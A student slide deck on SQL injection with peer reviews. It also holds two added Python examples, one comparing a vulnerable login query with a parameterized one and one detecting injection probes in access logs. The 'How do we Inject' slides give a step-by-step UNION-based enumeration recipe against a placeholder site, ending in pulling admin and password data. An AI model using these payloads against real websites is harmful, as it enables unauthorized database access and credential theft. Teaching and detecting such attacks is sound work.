
Insider Attacks & SQL injection

1Database System

Subject

Database System

Group Number 13

O Sarmad Nazir Abbasi

O SP13-BSE-071

O Ehtisham Ullah

O SP13-BSE-013


Members

1. Introduction

O SQL injection attacks

Methods to get unauthorized access to data or to a database

O There may be many reasons to attack a database or to get access to it (White hat)


2. SQL Injection

O App sends form to user.

O Attacker submits form with SQL exploit data.

O Application builds string with exploit data.

O Application sends SQL query to DB.

O DB executes query, including exploit, sends data back to application.

O Application returns data to user.

[Diagram: User / Attacker submits a Form with Pass ' or 1=1-- through the Firewall to the Web Server, which queries the DB Server]


3. Categories

O 1. SQL Manipulation

O 2. Code Injection

O 3. Function Call Injection

O 4. Buffer Overflows


An Example (Injection)

O SELECT * FROM users WHERE username = 'Sarmad' AND password = 'sarmadpassword'

An attacker can manipulate the SQL statement:

O SELECT * FROM users WHERE username = 'Sarmad' AND password = '1' OR 'x'='x'
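The following is an added example (not code from the slides) that runs the two statements above against a small constructed SQLite table. It shows the string-built query the slides describe ("Application builds string with exploit data") next to the parameterized form a developer should use; the table contents, function names and the second user are all invented for the demonstration.

```python
import sqlite3


def make_db():
    # Constructed in-memory stand-in for the users table in the slides (not a real schema).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('Sarmad', 'sarmadpassword')")
    conn.execute("INSERT INTO users VALUES ('Ehtisham', 'otherpassword')")
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    # The pattern the slides describe: the application builds the query as a string,
    # so whatever the user typed is parsed by the database as SQL.
    query = ("SELECT username FROM users WHERE username = '" + username
             + "' AND password = '" + password + "'")
    return [row[0] for row in conn.execute(query).fetchall()]


def login_parameterized(conn, username, password):
    # Hardened form: placeholders send the input as bound values, never as SQL text,
    # so a quote inside the password cannot close the string literal.
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in conn.execute(query, (username, password)).fetchall()]


def compare(username, password):
    """Run the same credentials through both versions and report who each one logs in."""
    conn = make_db()
    return {
        "vulnerable": login_vulnerable(conn, username, password),
        "parameterized": login_parameterized(conn, username, password),
    }


if __name__ == "__main__":
    print(compare("Sarmad", "sarmadpassword"))   # both versions: ['Sarmad']
    print(compare("Sarmad", "1' or 'x'='x"))      # vulnerable: every user; parameterized: []
    print(compare("' or 1=1--", "anything"))      # the diagram's payload in the username field
```

The vulnerable version returns every row for the manipulated password because AND binds tighter than OR, exactly as the second statement above reads; the parameterized version compares the typed text against the stored password as plain data and finds nothing.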


4. How do we Inject (website)

Step 1: Take any site (target). Let's say

http://www.site.com/abc.php?id=5

Step 2: Check the vulnerability by adding ' to the end of the above link.

If you get an error message, it means that the site is vulnerable to SQL injection.

Now you can be 100% sure that the site is vulnerable to SQL injection.


4. How do we Inject (website) cont...

Step 3: Find out the number of columns.

To find the number of columns we use the ORDER BY statement,
incrementing the number until we get an error.

http://www.site.com/abc.php?id=5 order by 1-- <-- no error

http://www.site.com/abc.php?id=5 order by 2-- <-- no error

http://www.site.com/abc.php?id=5 order by 3-- <-- no error

http://www.site.com/abc.php?id=5 order by 4-- <-- ERROR (we get a message like Unknown column '4')

So we can conclude that the table has 4 columns.


4. How do we Inject (website) cont...

Step 4: Check the MySQL version by replacing the 2 in the above step with version():

http://www.site.com/abc.php?id=5 union all select 1,version(),3--

Now you can find the version from the site; only if it is found to be above 5 do we continue to the next steps.

Use information_schema

Why do we use information_schema? The reason is very simple:
'In MySQL 5 and higher versions, information_schema holds all tables and columns in the database'.


4. How do we Inject (website) cont...

Step 5: To get the tables we use table_name and information_schema.tables:

http://www.site.com/abc.php?id=5 union all select 1,table_name,3 from information_schema.tables--

Here we go.

Now we have the column and table names; just retrieve the sensitive data like admin, user, passwords, etc.
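From the defender's side, the sequence in Steps 2 to 5 (a stray quote on a parameter, ORDER BY counting, UNION SELECT with version(), then information_schema) leaves a recognisable trail in the web server's access log. The scanner below is an added example, not part of the slides or of any product: the log lines are constructed, the signature names are this example's own labels, and the three-signature threshold is an arbitrary choice for the demonstration.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Signatures for the probing sequence the slides walk through. The names are this
# example's own labels, not a standard taxonomy.
SIGNATURES = [
    ("quote_probe", re.compile(r"'\s*$")),                          # value ends in a stray quote
    ("order_by_probe", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union_select", re.compile(r"\bunion\b(?:\s+all)?\s+select\b", re.I)),
    ("version_fn", re.compile(r"\bversion\s*\(\s*\)", re.I)),
    ("information_schema", re.compile(r"\binformation_schema\b", re.I)),
]

# Common log format: ip ident user [timestamp] "METHOD path PROTOCOL" status size
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3})')

# Constructed sample lines (not real traffic). The first address repeats the slides'
# steps against abc.php?id=5; the second is ordinary use, including a legitimate
# apostrophe inside a search term that must not be flagged.
LOG_LINES = [
    '203.0.113.7 - - [10/Oct/2013:13:55:36 +0000] "GET /abc.php?id=5 HTTP/1.1" 200 1043',
    '203.0.113.7 - - [10/Oct/2013:13:55:40 +0000] "GET /abc.php?id=5%27 HTTP/1.1" 500 512',
    '203.0.113.7 - - [10/Oct/2013:13:56:02 +0000] "GET /abc.php?id=5+order+by+4-- HTTP/1.1" 500 498',
    '203.0.113.7 - - [10/Oct/2013:13:57:10 +0000] "GET /abc.php?id=5+union+all+select+1,version(),3-- HTTP/1.1" 200 1102',
    '203.0.113.7 - - [10/Oct/2013:13:58:31 +0000] "GET /abc.php?id=5+union+all+select+1,table_name,3+from+information_schema.tables-- HTTP/1.1" 200 2310',
    '198.51.100.4 - - [10/Oct/2013:14:01:00 +0000] "GET /abc.php?id=7 HTTP/1.1" 200 1050',
    '198.51.100.4 - - [10/Oct/2013:14:01:05 +0000] "GET /search.php?q=o%27neil HTTP/1.1" 200 800',
]


def parse_line(line):
    """Split one access-log line into its fields, or return None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def scan_request(path):
    """Return the signature names matched by any URL-decoded query-string value."""
    hits = []
    for _, value in parse_qsl(urlsplit(path).query, keep_blank_values=True):
        for name, pattern in SIGNATURES:
            if name not in hits and pattern.search(value):
                hits.append(name)
    return hits


def scan_log(lines):
    """Map each client address to the sorted set of distinct signatures it triggered."""
    per_ip = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        hits = scan_request(rec["path"])
        if hits:
            per_ip.setdefault(rec["ip"], set()).update(hits)
    return {ip: sorted(sigs) for ip, sigs in per_ip.items()}


def escalate(per_ip, threshold=3):
    """Addresses that triggered at least `threshold` distinct signatures, i.e. walked the sequence."""
    return sorted(ip for ip, sigs in per_ip.items() if len(sigs) >= threshold)


if __name__ == "__main__":
    findings = scan_log(LOG_LINES)
    print(findings)             # only 203.0.113.7 appears, with all five signatures
    print(escalate(findings))   # ['203.0.113.7']
```

Matching on decoded parameter values rather than the raw URL is what lets the `%27` probe register while the apostrophe in `o'neil` (not at the end of the value) stays quiet; counting distinct signatures per address, rather than alerting on each line, is what separates a single odd request from the full enumeration walk.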

5. Disadvantages of SQL Injection

O Database Fingerprinting

O Denial of Service

O Bypassing Authentication

O Identifying Injectable Parameters

O Executing Remote Commands

O Performing Privilege Escalation


6. Current Tools

O SQL MAP

O SQL NINJA

Features:

O Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB database management systems.

O Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query, stacked queries and out-of-band.


6. Current Tools (cont...)

O Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.

O Support to enumerate users, password hashes, privileges, roles, databases, tables and columns.

O Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.


7. Practical Usage

O If your database is compromised, that means it has been hacked; you may want to crash your system, and that is not possible by using the admin table.

O Hacking a website or e-mail account

O National security services use SQL injection (where possible) to obtain data of high potential value.


8. Latest Research

O IBM RESEARCH – SQL INJECTION OFTEN LEADS TO A SUCCESSFUL BREACH

O New research from IBM's X-Force team names SQL injection as the most commonly traveled pathway to a successful breach during the first half of 2013.

O No one is really surprised by this, as SQL injection is the most direct way to gain access to records in the database. In terms of return on exploit, SQL injection is an effective attack of opportunity.


9. Future Work

O It is great to know we can access somewhere we are not authorized, but the more exciting it is, the more challenging it is.

O For most of the people who are creating this data, someone can access it, manipulate or delete it, or do whatever the attackers want, so our future work will be concerned with making a secure database.


10. Lesson Learnt (Till Now)

O We learnt Team- Coordination

O We learnt Time Management

O We learnt Use of SQL Injection


11. Conclusion

O SQL injection should be used for good and positive purposes only, but unfortunately many professionals are using SQL injection in a negative way, to break into databases without authorization.


Review by Sundas Tanveer and Ghalib Masood

Overall the presentation is good but following points need to be considered:

O Do not use slang, e.g. “damn”, in the 6th slide.

O Use correct formatting, e.g. a dot should be followed by a capital letter; make the ‘h’ of http links capital if the link is pasted at the start of a line.

O “ ‘ ” and “1” are used for no reason in the 6th slide.

O Use bullets in the right place, e.g. “Now here we go” should have been written without bullets.

O Add more visuals to the presentation. There is too little content.

O Detailed explanations, as used in Latest Research, should be avoided.

O Re-check your presentation and correct the formatting.

O The introduction should be clear and the points should be easy to understand.

O Try to make the presentation less complex and easy to understand.

Thank you.


Review by Sarmad Nazir And Ehtisham Ullah for Group #9

O Good, simple and formal slides, except the background color

O All the report's contents are covered

O This kind of background may cause visibility problems; it would be good if you changed the background color

O A little bit of animation would have made the presentation more interesting

O We hope this review will help you in improving your slides

O Best of Luck!!!
